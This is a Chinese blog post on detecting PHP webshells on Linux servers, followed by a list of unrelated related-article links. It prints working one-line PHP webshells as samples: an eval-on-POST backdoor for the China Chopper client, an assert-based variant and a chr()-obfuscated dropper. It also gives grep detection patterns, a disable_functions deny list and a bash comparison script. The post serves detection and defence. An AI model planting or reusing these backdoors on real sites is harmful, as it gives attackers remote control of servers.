原文出处:http://my.oschina.net/longquan/blog/155905

首先认识一下小马,一般大马容易暴露,骇客都会留一手,把小马加入正常PHP文件里面

<?php eval ($_POST[a]);?> //密码为a,使用中国菜刀连接

隐藏很深的小马

fputs(fopen(chr(46).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).
。。。省略

解码:
其中chr括号里面的数字是美国信息交换标准代码,缩写:ASCII 可以找一份对照表对应一下

比如 46  就是 .
       47  就是 /
       32  就是 空格

也可以echo chr(46)解出来
<?php
echo chr(46).chr(47).chr(97).chr(46)
?>

WINDOWS下的应该有很多日志分析和查杀工具(比如D盾等),那么,LINUX下如何查找WEBSHELL呢?

find /www/ -name "*.php" |xargs egrep 'assert|phpspy|c99sh|milw0rm|eval|\(gunerpress|\(base64_decoolcode|spider_bc|shell_exec|passthru|\(\$\_\POST\[|eval \(str_rot13|\.chr\(|\$\{\"\_P|eval\(\$\_R|file_put_contents\(\.\*\$\_|base64_decode'

然后就手工查看,写入计划任务啦。

只查小马的可以

grep -r --include=*.php  '[^a-z]eval($_POST' . > post.txt

grep -r --include=*.php  '[^a-z]eval($_REQUEST' . > REQUEST.txt

查出来了,重要的是要分析日志,查看入侵源头。

防范:

禁用危险函数,整理权限,防止权限过大

disable_functions = exec,scandir,shell_exec,phpinfo,eval,passthru,system,chroot,chgrp,chown,proc_open,proc_get_status,ini_alter,ini_restore,dl,openlog,syslog,readlink,s

ymlink,popepassthru,stream_socket_server,fsocket

在网上找了一份用PHP查找WEBSHELL的东东,适用数据量小及少

https://github.com/emposha/PHP-Shell-Detector

git 下来  只需要2个文件
shelldetect.php   //默认帐号密码 admin protect 
shelldetect.db

如果你有什么好的建议,感谢你的分享:)

20130826更新

小马的变种很多,经常会绕过我们的检查,此时,最好能做把文件进行对比。

比如,网上找的这个PHP一句话<?php $k="ass"."ert";$k(${"_PO"."ST"}['8']);?>

下面提供自己写的比较简单的检查脚本,思路是对比目录有更新的PHP文件进行匹配。

#!/bin/bash

# 先RSYNC干净的,再执行此脚本最好

Date=`date +%Y%m%d_%H:%M`

src=/www/www.a.com/

dest=/www/www.a.com.bk/

log_tmp1=/root/sh/webshell_php.log

log_result=/root/sh/webshell_result.log

which egrep

if [ $? -ne  ];then

echo "Not Found egrep,exit"

exit

fi

rsync -av --include="*/" --include="*.php" --exclude="*" $src $dest|grep -i php > $log_tmp1

for diff in `cat $log_tmp1`

  do

     egrep 'assert|phpspy|c99sh|milw0rm|eval|\(gunerpress|\(base64_decoolcode|spider_bc|shell_exec|passthru|\(\$\_\POST\[|eval \(str_rot13|\.chr\(|\$\{\"\_P|eval\(\$\_R|file_put_contents\(\.\*\$\_|base64_decode|\@preg_replace' "$dest""$diff"

  if [ $? -eq  ];then

     echo "===========================" >> $log_result

     echo "$Date" >> $log_result

     echo "$dest$diff is Dangerous" >> $log_result

   fi

done

最后

欢迎关注个人微信公众号:Bypass--,每周一篇原创高质量的干货。 

扩展阅读:

shell反弹

php-security-best-practices-tutorial

十大PHP最佳安全实践

使用suhosin保护PHP

linux查找webshell的更多相关文章

  1. linux查找进程id端口占用和杀死进程

    linux 查找进程id端口占用和杀死进程 ps 命令用于查看当前正在运行的进程 辅助上grep 用于搜索匹配ps -ef | grep java ps ax : 显示当前系统进程的列表 ps aux ...

  2. centos、linux查找未挂载磁盘格式化并挂载?

    centos.linux查找未挂载磁盘格式化并挂载? df -h 查看当前linux服务器硬盘: fdisk -l /dev/sda   第一块硬盘 /dev/sdb   第二块硬盘 依此类推 以/d ...

  3. linux查找yum和rpm安装路径

    linux查找yum和rpm安装路径 转:https://jingyan.baidu.com/article/86112f1378bf282737978730.html

  4. [转] Linux 查找文件内容

    Linux查找文件内容的常用命令方法. 从文件内容查找匹配指定字符串的行: $ grep "被查找的字符串" 文件名例子:在当前目录里第一级文件夹中寻找包含指定字符串的.in文件g ...

  5. linux查找命令(find)

    linux查找命令(find) 命令格式: find [目录] [选项] [选项的条件] 选项: -name:文件名称查找 -size:文件的大小来查找 -perm:文件的权限来查找 ①根据文件的名称 ...

  6. Linux —— 查找与替换

    Linux —— 查找与替换 文本查找: grep, egrep, fgrep        grep:根据基本正则表达式定义的模式搜索文档,并将符合模式的文本行显示出来        注意:搜索时属 ...

  7. Linux查找和替换目录下所有文件中字符串(转载)

    转自:http://rubyer.me/blog/1613/ 单个文件中查找替换很简单,就不说了.文件夹下所有文件中字符串的查找替换就要记忆了,最近部署几十台linux服务器,记录下总结. 查找文件夹 ...

  8. Linux查找含有特定字符串的文件

    Linux查找含有特定字符串的文件命令为grep.以下为详细的使用方法 grep [OPTIONS] PATTERN [FILE...] #实例:递归查找当前文件夹下所有含有test的文件,并显示行号 ...

  9. Linux 查找特定程序 whereis

    Linux 查找特定程序 whereis whereis 命令主要用于查找程序文件,并提供这个文件的二进制可执行文件.源代码文件和使用手册存放位置. 1.查找命令程序 例如,查找 touch 命令 [ ...

随机推荐

  1. Json数据,日期的转换

    using (SQLiteConnection con = new SQLiteConnection(Constants.DATA_SOURCE)) { con.Open(); using (SQLi ...

  2. 3.2 Git 分支 - 分支的新建与合并

    分支的新建与合并 现在让我们来看一个简单的分支与合并的例子,实际工作中大体也会用到这样的工作流程: 开发某个网站. 为实现某个新的需求,创建一个分支. 在这个分支上开展工作. 假设此时,你突然接到一个 ...

  3. acvitity的日常 启动模式(上)

    1. 基本介绍 大家平时只要懂一点Android知识的话,都一定会知道,一个应用的组成,往往包含了许多的activity组件,每个activity都应该围绕用户的特定动作进行跳转设计.比如说,一个电话 ...

  4. 在VS中使用类模板出现出现LNK2019: 无法解析的外部符号错误。

    在VS中使用类模板出现出现LNK2019: 无法解析的外部符号错误,应在一个.h文件中完成方法的声明与实现,不要将实现放在cpp文件里,VS貌似不支持类模板分离

  5. Java基础01 ------ 从HelloWorld到面向对象

    Java是完全面向对象的语言.Java通过虚拟机的运行机制,实现“跨平台”的理念.我在这里想要呈现一个适合初学者的教程,希望对大家有用. "Hello World!" 先来看一个H ...

  6. python 接口开发(一)

    cmd中,提示pip版本太低,先升级pip   pip install --upgrade pip (pip,安装和管理python扩展包的工具) cmd下,pip,出现详细信息证明装成功了 pip ...

  7. 2013年国庆节前51Aspx源码发布详情

    Sky软件公司网站修正版源码  2013-9-30 [VS2010]源码描述:针对Sky软件公司网站源码进行修正.修改ckeditor引用问题,发布样式错误问题.vs2010直接编译.发布成功. 网站 ...

  8. js库之art.dialog

    自适应内容 artDialog的特殊UI框架能够适应内容变化,甚至连外部程序动态插入的内容它仍然能自适应,因此你不必去考虑消息内容尺寸使用它.它的消息容器甚至能够根据宽度让文本居中或居左对齐——这一切 ...

  9. SAP 中如何寻找增强

    http://blog.csdn.net/edifierliu/article/details/5978824 查找SAP标准事务代码中使用的BADI: 在SE24中,查看类对象CL_EXITHAND ...

  10. UVA11624(bfs)

    题意:给一张图,有火源,有障碍物,剩下的是道路,火源在下一分钟能够让上下左右四个方向的道路也着火,告诉人的位置,问最短时间能逃出去的时间是多少: 思路:一个bfs用来求出所有的火源能蔓延到的地方,另一 ...